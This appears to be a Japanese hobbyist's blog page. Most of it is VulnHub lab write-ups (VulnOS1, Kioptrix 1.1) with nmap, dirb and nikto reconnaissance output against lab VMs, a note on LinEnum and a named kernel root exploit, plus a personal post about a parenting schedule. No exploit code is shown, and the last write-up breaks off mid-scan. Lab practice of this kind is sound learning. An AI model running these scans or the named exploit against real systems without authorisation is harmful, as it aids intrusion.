【WriteUp】VulnOS1

新しいVMに挑戦

 

使用ツール

 

 

偵察

% sudo nmap -sS -sV -A -p 1-20000 192.168.3.10
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-04 01:23 EDT
Nmap scan report for 192.168.3.10
Host is up (0.0011s latency).
Not shown: 19975 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.3p1 Debian 3ubuntu7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 43:a6:84:8d:be:1a:ee:fb:ed:c3:23:53:14:14:8f:50 (DSA)
|_ 2048 30:1d:2d:c4:9e:66:d8:bd:70:7c:48:84:fb:b9:7b:09 (RSA)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
|_smtp-commands: VulnOS.home, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
|_ssl-date: 2020-04-04T05:24:58+00:00; 0s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_RC4_128_WITH_MD5
| SSL2_DES_64_CBC_WITH_MD5
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| SSL2_RC4_128_EXPORT40_WITH_MD5
|_ SSL2_RC2_128_CBC_WITH_MD5
53/tcp open domain ISC BIND 9.7.0-P1
| dns-nsid:
|_ bind.version: 9.7.0-P1
80/tcp open http Apache httpd 2.2.14 *1
|_http-server-header: Apache/2.2.14 (Ubuntu)
|_http-title: index
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: UIDL PIPELINING STLS SASL RESP-CODES CAPA TOP
|_ssl-date: 2020-04-04T05:24:57+00:00; -1s from scanner time.
| sslv2:
| SSLv2 supported
|_ ciphers: none
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
|_imap-capabilities: CHILDREN SORT=DISPLAY I18NLEVEL=1 ESEARCH completed Capability SORT LOGINDISABLEDA0001 ENABLE IMAP4rev1 CONTEXT=SEARCH UIDPLUS OK ID IDLE SEARCHRES ESORT QRESYNC SASL-IR THREAD=REFERENCES LOGIN-REFERRALS CONDSTORE THREAD=REFS LIST-EXTENDED STARTTLS NAMESPACE WITHIN UNSELECT MULTIAPPEND LITERAL+
|_ssl-date: 2020-04-04T05:24:58+00:00; 0s from scanner time.
| sslv2:
| SSLv2 supported
|_ ciphers: none
389/tcp open ldap OpenLDAP 2.2.X - 2.3.X
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
512/tcp open exec netkit-rsh rexecd
513/tcp open login?
514/tcp open tcpwrapped
901/tcp open http Samba SWAT administration server
| http-auth:
| HTTP/1.0 401 Authorization Required\x0D
|_ Basic realm=SWAT
|_http-title: 401 Authorization Required
993/tcp open ssl/imaps?
|_ssl-date: 2020-04-04T05:24:59+00:00; 0s from scanner time.
| sslv2:
| SSLv2 supported
|_ ciphers: none
995/tcp open ssl/pop3s?
|_ssl-date: 2020-04-04T05:24:57+00:00; 0s from scanner time.
| sslv2:
| SSLv2 supported
|_ ciphers: none
2000/tcp open sieve Dovecot timsieved
2049/tcp open nfs 2-4 (RPC #100003)
3306/tcp open mysql MySQL 5.1.73-0ubuntu0.10.04.1
| mysql-info:
| Protocol: 10
| Version: 5.1.73-0ubuntu0.10.04.1
| Thread ID: 311
| Capabilities flags: 63487
| Some Capabilities: IgnoreSpaceBeforeParenthesis, Speaks41ProtocolNew, DontAllowDatabaseTableColumn, LongColumnFlag, Speaks41ProtocolOld, SupportsCompression, Support41Auth, FoundRows, IgnoreSigpipes, InteractiveClient, LongPassword, ODBCClient, SupportsLoadDataLocal, ConnectWithDatabase, SupportsTransactions
| Status: Autocommit
|_ Salt: 0iEZt\LIgL(#q5R{8D+I
3632/tcp open tcpwrapped
6667/tcp open irc IRCnet ircd
| irc-info:
| users: 1
| servers: 1
| chans: 15
| lusers: 1
| lservers: 0
| server: irc.localhost
| version: 2.11.2p1. irc.localhost 000A
| uptime: 0 days, 0:04:05
| source ident: NONE or BLOCKED
| source host: 192.168.3.27
|_ error: Closing Link: wisjlfego[~nmap@192.168.3.27] ()
8070/tcp open ucs-isc?
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
| http-methods:
|_ Potentially risky methods: PUT DELETE
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat
10000/tcp open http MiniServ 0.01 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
MAC Address: 08:00:27:43:06:19 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6.32
OS details: Linux 2.6.32
Network Distance: 1 hop
Service Info: Hosts: VulnOS.home, irc.localhost; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_nbstat: NetBIOS name: VULNOS, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
|_smb2-time: Protocol negotiation failed (SMB2)

TRACEROUTE
HOP RTT ADDRESS
1 1.11 ms 192.168.3.10

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 246.76 seconds

 

結果、生きているサービスは

22/tcp open ssh OpenSSH 5.3p1 Debian 3ubuntu7 (Ubuntu Linux; protocol 2.0)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
53/tcp open domain ISC BIND 9.7.0-P1
80/tcp open http Apache httpd 2.2.14 *2
110/tcp open pop3 Dovecot pop3d
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
389/tcp open ldap OpenLDAP 2.2.X - 2.3.X
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
512/tcp open exec netkit-rsh rexecd
513/tcp open login?
514/tcp open tcpwrapped
901/tcp open http Samba SWAT administration server
993/tcp open ssl/imaps?
995/tcp open ssl/pop3s?
2000/tcp open sieve Dovecot timsieved
2049/tcp open nfs 2-4 (RPC #100003)
3306/tcp open mysql MySQL 5.1.73-0ubuntu0.10.04.1
3632/tcp open tcpwrapped
6667/tcp open irc IRCnet ircd
8070/tcp open ucs-isc?
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
10000/tcp open http MiniServ 0.01 (Webmin httpd)

 

正直、ドン引きするほど空いている感じですね

かなり多くのルートが考えられるのではないかと思います

 

 

次、dirb

% dirb http://192.168.3.10

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Sat Apr 4 01:31:10 2020
URL_BASE: http://192.168.3.10/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.3.10/ ----
+ http://192.168.3.10/.htaccess (CODE:200|SIZE:501)
+ http://192.168.3.10/cgi-bin/ (CODE:403|SIZE:288)
==> DIRECTORY: http://192.168.3.10/imgs/
+ http://192.168.3.10/index (CODE:200|SIZE:745)
+ http://192.168.3.10/index.html (CODE:200|SIZE:745)
+ http://192.168.3.10/index2 (CODE:200|SIZE:1066)
==> DIRECTORY: http://192.168.3.10/javascript/
==> DIRECTORY: http://192.168.3.10/mediawiki/
==> DIRECTORY: http://192.168.3.10/phpldapadmin/
==> DIRECTORY: http://192.168.3.10/phpmyadmin/
==> DIRECTORY: http://192.168.3.10/phppgadmin/
+ http://192.168.3.10/server-status (CODE:403|SIZE:293)

---- Entering directory: http://192.168.3.10/imgs/ ----
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.3.10/javascript/ ----
==> DIRECTORY: http://192.168.3.10/javascript/jquery/

---- Entering directory: http://192.168.3.10/mediawiki/ ----
==> DIRECTORY: http://192.168.3.10/mediawiki/config/
==> DIRECTORY: http://192.168.3.10/mediawiki/extensions/
==> DIRECTORY: http://192.168.3.10/mediawiki/images/
+ http://192.168.3.10/mediawiki/includes (CODE:403|SIZE:298)
+ http://192.168.3.10/mediawiki/index.php (CODE:301|SIZE:0)
+ http://192.168.3.10/mediawiki/languages (CODE:403|SIZE:299)
+ http://192.168.3.10/mediawiki/maintenance (CODE:403|SIZE:301)
==> DIRECTORY: http://192.168.3.10/mediawiki/skins/

---- Entering directory: http://192.168.3.10/phpldapadmin/ ----
==> DIRECTORY: http://192.168.3.10/phpldapadmin/css/
==> DIRECTORY: http://192.168.3.10/phpldapadmin/images/
+ http://192.168.3.10/phpldapadmin/index.php (CODE:200|SIZE:4731)
==> DIRECTORY: http://192.168.3.10/phpldapadmin/js/

---- Entering directory: http://192.168.3.10/phpmyadmin/ ----
+ http://192.168.3.10/phpmyadmin/favicon.ico (CODE:200|SIZE:18902)
+ http://192.168.3.10/phpmyadmin/index.php (CODE:200|SIZE:8625)
==> DIRECTORY: http://192.168.3.10/phpmyadmin/js/
==> DIRECTORY: http://192.168.3.10/phpmyadmin/lang/
+ http://192.168.3.10/phpmyadmin/libraries (CODE:403|SIZE:300)
+ http://192.168.3.10/phpmyadmin/phpinfo.php (CODE:200|SIZE:0)
+ http://192.168.3.10/phpmyadmin/setup (CODE:401|SIZE:479)
==> DIRECTORY: http://192.168.3.10/phpmyadmin/themes/

---- Entering directory: http://192.168.3.10/phppgadmin/ ----
==> DIRECTORY: http://192.168.3.10/phppgadmin/classes/
==> DIRECTORY: http://192.168.3.10/phppgadmin/conf/
==> DIRECTORY: http://192.168.3.10/phppgadmin/help/
==> DIRECTORY: http://192.168.3.10/phppgadmin/images/
+ http://192.168.3.10/phppgadmin/index.php (CODE:200|SIZE:1012)
+ http://192.168.3.10/phppgadmin/info.php (CODE:200|SIZE:19)
==> DIRECTORY: http://192.168.3.10/phppgadmin/lang/
==> DIRECTORY: http://192.168.3.10/phppgadmin/libraries/
+ http://192.168.3.10/phppgadmin/robots.txt (CODE:200|SIZE:221)
==> DIRECTORY: http://192.168.3.10/phppgadmin/sql/
==> DIRECTORY: http://192.168.3.10/phppgadmin/themes/

---- Entering directory: http://192.168.3.10/javascript/jquery/ ----
+ http://192.168.3.10/javascript/jquery/jquery (CODE:200|SIZE:120653)

---- Entering directory: http://192.168.3.10/mediawiki/config/ ----
+ http://192.168.3.10/mediawiki/config/index.php (CODE:200|SIZE:3009)

---- Entering directory: http://192.168.3.10/mediawiki/extensions/ ----
+ http://192.168.3.10/mediawiki/extensions/README (CODE:200|SIZE:583)

---- Entering directory: http://192.168.3.10/mediawiki/images/ ----

---- Entering directory: http://192.168.3.10/mediawiki/skins/ ----
==> DIRECTORY: http://192.168.3.10/mediawiki/skins/common/
==> DIRECTORY: http://192.168.3.10/mediawiki/skins/disabled/
==> DIRECTORY: http://192.168.3.10/mediawiki/skins/simple/

---- Entering directory: http://192.168.3.10/phpldapadmin/css/ ----
==> DIRECTORY: http://192.168.3.10/phpldapadmin/css/default/

---- Entering directory: http://192.168.3.10/phpldapadmin/images/ ----
==> DIRECTORY: http://192.168.3.10/phpldapadmin/images/default/
+ http://192.168.3.10/phpldapadmin/images/favicon.ico (CODE:200|SIZE:902)

---- Entering directory: http://192.168.3.10/phpldapadmin/js/ ----

---- Entering directory: http://192.168.3.10/phpmyadmin/js/ ----

---- Entering directory: http://192.168.3.10/phpmyadmin/lang/ ----

---- Entering directory: http://192.168.3.10/phpmyadmin/themes/ ----
==> DIRECTORY: http://192.168.3.10/phpmyadmin/themes/original/

---- Entering directory: http://192.168.3.10/phppgadmin/classes/ ----
==> DIRECTORY: http://192.168.3.10/phppgadmin/classes/database/
==> DIRECTORY: http://192.168.3.10/phppgadmin/classes/plugins/

---- Entering directory: http://192.168.3.10/phppgadmin/conf/ ----

---- Entering directory: http://192.168.3.10/phppgadmin/help/ ----

---- Entering directory: http://192.168.3.10/phppgadmin/images/ ----
==> DIRECTORY: http://192.168.3.10/phppgadmin/images/themes/

---- Entering directory: http://192.168.3.10/phppgadmin/lang/ ----
+ http://192.168.3.10/phppgadmin/lang/Makefile (CODE:200|SIZE:7373)

---- Entering directory: http://192.168.3.10/phppgadmin/libraries/ ----
==> DIRECTORY: http://192.168.3.10/phppgadmin/libraries/adodb/

---- Entering directory: http://192.168.3.10/phppgadmin/sql/ ----

---- Entering directory: http://192.168.3.10/phppgadmin/themes/ ----
==> DIRECTORY: http://192.168.3.10/phppgadmin/themes/default/

---- Entering directory: http://192.168.3.10/mediawiki/skins/common/ ----
==> DIRECTORY: http://192.168.3.10/mediawiki/skins/common/images/

---- Entering directory: http://192.168.3.10/mediawiki/skins/disabled/ ----

---- Entering directory: http://192.168.3.10/mediawiki/skins/simple/ ----

---- Entering directory: http://192.168.3.10/phpldapadmin/css/default/ ----

---- Entering directory: http://192.168.3.10/phpldapadmin/images/default/ ----
+ http://192.168.3.10/phpldapadmin/images/default/index.php (CODE:200|SIZE:19434)

---- Entering directory: http://192.168.3.10/phpmyadmin/themes/original/ ----
==> DIRECTORY: http://192.168.3.10/phpmyadmin/themes/original/css/
==> DIRECTORY: http://192.168.3.10/phpmyadmin/themes/original/img/

---- Entering directory: http://192.168.3.10/phppgadmin/classes/database/ ----

---- Entering directory: http://192.168.3.10/phppgadmin/classes/plugins/ ----

---- Entering directory: http://192.168.3.10/phppgadmin/images/themes/ ----
==> DIRECTORY: http://192.168.3.10/phppgadmin/images/themes/default/

---- Entering directory: http://192.168.3.10/phppgadmin/libraries/adodb/ ----
==> DIRECTORY: http://192.168.3.10/phppgadmin/libraries/adodb/drivers/
==> DIRECTORY: http://192.168.3.10/phppgadmin/libraries/adodb/lang/

---- Entering directory: http://192.168.3.10/phppgadmin/themes/default/ ----

---- Entering directory: http://192.168.3.10/mediawiki/skins/common/images/ ----
==> DIRECTORY: http://192.168.3.10/mediawiki/skins/common/images/ar/
==> DIRECTORY: http://192.168.3.10/mediawiki/skins/common/images/de/
==> DIRECTORY: http://192.168.3.10/mediawiki/skins/common/images/fa/
==> DIRECTORY: http://192.168.3.10/mediawiki/skins/common/images/icons/

---- Entering directory: http://192.168.3.10/phpmyadmin/themes/original/css/ ----

---- Entering directory: http://192.168.3.10/phpmyadmin/themes/original/img/ ----

---- Entering directory: http://192.168.3.10/phppgadmin/images/themes/default/ ----

---- Entering directory: http://192.168.3.10/phppgadmin/libraries/adodb/drivers/ ----

---- Entering directory: http://192.168.3.10/phppgadmin/libraries/adodb/lang/ ----

---- Entering directory: http://192.168.3.10/mediawiki/skins/common/images/ar/ ----

---- Entering directory: http://192.168.3.10/mediawiki/skins/common/images/de/ ----

---- Entering directory: http://192.168.3.10/mediawiki/skins/common/images/fa/ ----

---- Entering directory: http://192.168.3.10/mediawiki/skins/common/images/icons/ ----

-----------------
END_TIME: Sat Apr 4 01:35:21 2020
DOWNLOADED: 212152 - FOUND: 25

 

 

結果、以下のURLが生きていることが判明しました

+ http://192.168.3.10/.htaccess (CODE:200|SIZE:501)
+ http://192.168.3.10/cgi-bin/ (CODE:403|SIZE:288)
+ http://192.168.3.10/index (CODE:200|SIZE:745)
+ http://192.168.3.10/index.html (CODE:200|SIZE:745)
+ http://192.168.3.10/index2 (CODE:200|SIZE:1066)
==> DIRECTORY: http://192.168.3.10/mediawiki/
==> DIRECTORY: http://192.168.3.10/phpldapadmin/
==> DIRECTORY: http://192.168.3.10/phpmyadmin/
==> DIRECTORY: http://192.168.3.10/phppgadmin/


---- Entering directory: http://192.168.3.10/mediawiki/ ----
==> DIRECTORY: http://192.168.3.10/mediawiki/config/
==> DIRECTORY: http://192.168.3.10/mediawiki/extensions/
==> DIRECTORY: http://192.168.3.10/mediawiki/images/
+ http://192.168.3.10/mediawiki/includes (CODE:403|SIZE:298)
+ http://192.168.3.10/mediawiki/index.php (CODE:301|SIZE:0)
+ http://192.168.3.10/mediawiki/languages (CODE:403|SIZE:299)
+ http://192.168.3.10/mediawiki/maintenance (CODE:403|SIZE:301)
==> DIRECTORY: http://192.168.3.10/mediawiki/skins/

---- Entering directory: http://192.168.3.10/phpldapadmin/ ----
==> DIRECTORY: http://192.168.3.10/phpldapadmin/css/
==> DIRECTORY: http://192.168.3.10/phpldapadmin/images/
+ http://192.168.3.10/phpldapadmin/index.php (CODE:200|SIZE:4731)
==> DIRECTORY: http://192.168.3.10/phpldapadmin/js/

---- Entering directory: http://192.168.3.10/phpmyadmin/ ----
+ http://192.168.3.10/phpmyadmin/index.php (CODE:200|SIZE:8625)
+ http://192.168.3.10/phpmyadmin/phpinfo.php (CODE:200|SIZE:0)

---- Entering directory: http://192.168.3.10/phppgadmin/ ---- 
==> DIRECTORY: http://192.168.3.10/phppgadmin/conf/
+ http://192.168.3.10/phppgadmin/index.php (CODE:200|SIZE:1012)
+ http://192.168.3.10/phppgadmin/info.php (CODE:200|SIZE:19)
+ http://192.168.3.10/phppgadmin/robots.txt (CODE:200|SIZE:221)
==> DIRECTORY: http://192.168.3.10/phppgadmin/sql/

---- Entering directory: http://192.168.3.10/mediawiki/config/ ----
+ http://192.168.3.10/mediawiki/config/index.php (CODE:200|SIZE:3009)

==> DIRECTORY: http://192.168.3.10/phppgadmin/classes/database/
==> DIRECTORY: http://192.168.3.10/phppgadmin/classes/plugins/

---- Entering directory: http://192.168.3.10/phppgadmin/conf/ ----
+ http://192.168.3.10/phppgadmin/lang/Makefile (CODE:200|SIZE:7373)

+ http://192.168.3.10/phpldapadmin/images/default/index.php (CODE:200|SIZE:19434)

 

さらに、niktoを使って確認

% nikto -h 192.168.3.10
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.3.10
+ Target Hostname: 192.168.3.10
+ Target Port: 80
+ Start Time: 2020-04-04 01:29:12 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.2.14 (Ubuntu)
+ Server may leak inodes via ETags, header found with file /, inode: 1062203, size: 745, mtime: Sat Mar 29 20:35:52 2014
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html
+ Apache/2.2.14 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ OSVDB-3268: /doc/: Directory indexing found.
+ OSVDB-48: /doc/: The /doc/ directory is browsable. This may be /usr/doc.
+ OSVDB-3268: /imgs/: Directory indexing found.
+ OSVDB-3092: /imgs/: This might be interesting...
+ Retrieved x-powered-by header: PHP/5.3.2-1ubuntu4.23
+ OSVDB-3092: /phpmyadmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3093: /.htaccess: Contains configuration and/or authorization information
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ Cookie 5d89dac18813e15aa2f75788275e3588 created without the httponly flag
+ /phpldapadmin/: Admin login page/section found.
+ Cookie PPA_ID created without the httponly flag
+ /phppgadmin/: Admin login page/section found.
+ /phpmyadmin/: phpMyAdmin directory found
+ OSVDB-3092: /phpmyadmin/Documentation.html: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ 8877 requests: 0 error(s) and 23 item(s) reported on remote host
+ End Time: 2020-04-04 01:29:44 (GMT-4) (32 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

 

さらに、nmapの結果を受けてポートを変更して実行

% nikto -h 192.168.3.10 -p 8080
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.3.10
+ Target Hostname: 192.168.3.10
+ Target Port: 8080
+ Start Time: 2020-04-04 01:38:59 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache-Coyote/1.1
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS
+ OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
+ OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
+ /: Appears to be a default Apache Tomcat install.
+ /examples/servlets/index.html: Apache Tomcat default JSP pages present.
+ Cookie JSESSIONID created without the httponly flag
+ OSVDB-3720: /examples/jsp/snp/snoop.jsp: Displays information about page retrievals, including other users.
+ /manager/html: Default Tomcat Manager / Host Manager interface found
+ /manager/status: Default Tomcat Server Status interface found
+ 8221 requests: 0 error(s) and 12 item(s) reported on remote host
+ End Time: 2020-04-04 01:39:31 (GMT-4) (32 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

 

 

 

侵入

 

 

権限昇格

 

 

 

 

Hack The Boxきついっす()

前回VulnHubの方がやりやすいって事でまたやってたんですが、

少し頑張ったしHack The Box戻っても少しはいけんじゃね!?

と思ってやったら

 

 

 

 

ダメでした⭐️

 

 

 

 

なんだろう、根本的にスキルが欠けてるんだろうな…

 

 

Hack The BoxのWriteUpみるしかないわね…!

 

以上

最近のスケジュール

今までの話題と全く違うが、

現在の一日のスケジュールを書き出してみたい

 

0:00-6:00 睡眠

6:00-8:00 朝支度、家事①

8:00-9:00 登園させる、家事②

9:00-12:00 在宅

12:00-13:00 昼

13:00-18:00 在宅

18:00-20:00 食事、風呂入れ、家事③

20:00-21:00 寝かしつけ

(-23:00まで寝落ちすることあり

23:00-24:00 歯磨き、風呂、家事④

24:00-睡眠(1時間PCいじってることも)

 

あれ?

結構がちがちやんな・・・?

 

 

前まではここに通勤時間が加わって、

そこが自分の時間になってたのよね

育児、恐るべし・・・

※でもかわいいからすべて許せる自分がいる

Kioptrix 1.1 (LinEnum.sh、権限昇格の別解、ps)

 

色々確認する

 

LinEnum.shについて

権限昇格の際、どのファイルを見るべきか判断に迷う

LinEnumを用いると、いろいろな権限周りを確認することができる

→そこから権限昇格につなげられる

 

 

権限昇格の別解

今回、権限昇格をCentOS脆弱性を用いて行なったが、

他にもkernel exploit(Linux kernel 2.6 < 2.6.19 (32bit) ip_append_data() local ring0 root exploit)

があるらしい

こちらを用いて再度権限昇格を行ってみる

 →ボケてました、これがそのCentOS脆弱性だよ!

 

ps によるプロセス確認

上記と同じく、権限昇格に使えるプロセス等を確認するためにも、psでプロセス確認は有効である

 

 

 

以上

 

【WriteUp】Kioptrix Level1.1

はじめに

またいつぞやのリベンジ

Kioptrixの続編を独力でプレイ

 

 

使用ツール

nmap

nikto

dirb

 

 

偵察

% nmap -sS -sV -A -T5 -p 1-20000 192.168.3.30

 

Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-28 11:15 EDT
Nmap scan report for 192.168.3.30
Host is up (0.0012s latency).
Not shown: 9993 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)
80/tcp open http Apache httpd 2.0.52 *1
111/tcp open rpcbind 2 (RPC #100000)
443/tcp open ssl/https?
631/tcp open ipp CUPS 1.1
784/tcp open status 1 (RPC #100024)
3306/tcp open mysql MySQL (unauthorized)
MAC Address: 00:0C:29:EF:7A:CC (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.49 seconds

 

結果、動作しているサービスは以下

22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)
80/tcp open http Apache httpd 2.0.52 *2
111/tcp open rpcbind 2 (RPC #100000)
443/tcp open ssl/https?
631/tcp open ipp CUPS 1.1
784/tcp open status 1 (RPC #100024)
3306/tcp open mysql MySQL (unauthorized)

 

% dirb http://192.168.3.30

 


-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Sat Mar 28 11:15:48 2020
URL_BASE: http://192.168.3.30/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.3.30/ ----
+ http://192.168.3.30/cgi-bin/ (CODE:403|SIZE:288)
+ http://192.168.3.30/index.php (CODE:200|SIZE:667)
==> DIRECTORY: http://192.168.3.30/manual/
+ http://192.168.3.30/usage (CODE:403|SIZE:285)

---- Entering directory: http://192.168.3.30/manual/ ----
==> DIRECTORY: http://192.168.3.30/manual/de/
==> DIRECTORY: http://192.168.3.30/manual/developer/
==> DIRECTORY: http://192.168.3.30/manual/en/
==> DIRECTORY: http://192.168.3.30/manual/faq/
==> DIRECTORY: http://192.168.3.30/manual/fr/
==> DIRECTORY: http://192.168.3.30/manual/howto/
==> DIRECTORY: http://192.168.3.30/manual/images/
+ http://192.168.3.30/manual/index.html (CODE:200|SIZE:7234)
==> DIRECTORY: http://192.168.3.30/manual/ja/
==> DIRECTORY: http://192.168.3.30/manual/ko/
+ http://192.168.3.30/manual/LICENSE (CODE:200|SIZE:11358)
==> DIRECTORY: http://192.168.3.30/manual/misc/
==> DIRECTORY: http://192.168.3.30/manual/mod/
==> DIRECTORY: http://192.168.3.30/manual/programs/
==> DIRECTORY: http://192.168.3.30/manual/ru/
==> DIRECTORY: http://192.168.3.30/manual/ssl/
==> DIRECTORY: http://192.168.3.30/manual/style/

---- Entering directory: http://192.168.3.30/manual/de/ ----
+ http://192.168.3.30/manual/de/de (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/de/developer/
+ http://192.168.3.30/manual/de/en (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/de/faq/
+ http://192.168.3.30/manual/de/fr (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/de/howto/
==> DIRECTORY: http://192.168.3.30/manual/de/images/
+ http://192.168.3.30/manual/de/index.html (CODE:200|SIZE:7317)
+ http://192.168.3.30/manual/de/ja (CODE:301|SIZE:315)
+ http://192.168.3.30/manual/de/ko (CODE:301|SIZE:315)
+ http://192.168.3.30/manual/de/LICENSE (CODE:200|SIZE:11358)
==> DIRECTORY: http://192.168.3.30/manual/de/misc/
==> DIRECTORY: http://192.168.3.30/manual/de/mod/
==> DIRECTORY: http://192.168.3.30/manual/de/programs/
+ http://192.168.3.30/manual/de/ru (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/de/ssl/
==> DIRECTORY: http://192.168.3.30/manual/de/style/

---- Entering directory: http://192.168.3.30/manual/developer/ ----
+ http://192.168.3.30/manual/developer/index.html (CODE:200|SIZE:4770)

---- Entering directory: http://192.168.3.30/manual/en/ ----
+ http://192.168.3.30/manual/en/de (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/en/developer/
+ http://192.168.3.30/manual/en/en (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/en/faq/
+ http://192.168.3.30/manual/en/fr (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/en/howto/
==> DIRECTORY: http://192.168.3.30/manual/en/images/
+ http://192.168.3.30/manual/en/index.html (CODE:200|SIZE:7234)
+ http://192.168.3.30/manual/en/ja (CODE:301|SIZE:315)
+ http://192.168.3.30/manual/en/ko (CODE:301|SIZE:315)
+ http://192.168.3.30/manual/en/LICENSE (CODE:200|SIZE:11358)
==> DIRECTORY: http://192.168.3.30/manual/en/misc/
==> DIRECTORY: http://192.168.3.30/manual/en/mod/
==> DIRECTORY: http://192.168.3.30/manual/en/programs/
+ http://192.168.3.30/manual/en/ru (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/en/ssl/
==> DIRECTORY: http://192.168.3.30/manual/en/style/

---- Entering directory: http://192.168.3.30/manual/faq/ ----
+ http://192.168.3.30/manual/faq/index.html (CODE:200|SIZE:3564)

---- Entering directory: http://192.168.3.30/manual/fr/ ----
+ http://192.168.3.30/manual/fr/de (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/fr/developer/
+ http://192.168.3.30/manual/fr/en (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/fr/faq/
+ http://192.168.3.30/manual/fr/fr (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/fr/howto/
==> DIRECTORY: http://192.168.3.30/manual/fr/images/
+ http://192.168.3.30/manual/fr/index.html (CODE:200|SIZE:7234)
+ http://192.168.3.30/manual/fr/ja (CODE:301|SIZE:315)
+ http://192.168.3.30/manual/fr/ko (CODE:301|SIZE:315)
+ http://192.168.3.30/manual/fr/LICENSE (CODE:200|SIZE:11358)
==> DIRECTORY: http://192.168.3.30/manual/fr/misc/
==> DIRECTORY: http://192.168.3.30/manual/fr/mod/
==> DIRECTORY: http://192.168.3.30/manual/fr/programs/
+ http://192.168.3.30/manual/fr/ru (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/fr/ssl/
==> DIRECTORY: http://192.168.3.30/manual/fr/style/

---- Entering directory: http://192.168.3.30/manual/howto/ ----
+ http://192.168.3.30/manual/howto/index.html (CODE:200|SIZE:5685)

---- Entering directory: http://192.168.3.30/manual/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.3.30/manual/ja/ ----
+ http://192.168.3.30/manual/ja/de (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/ja/developer/
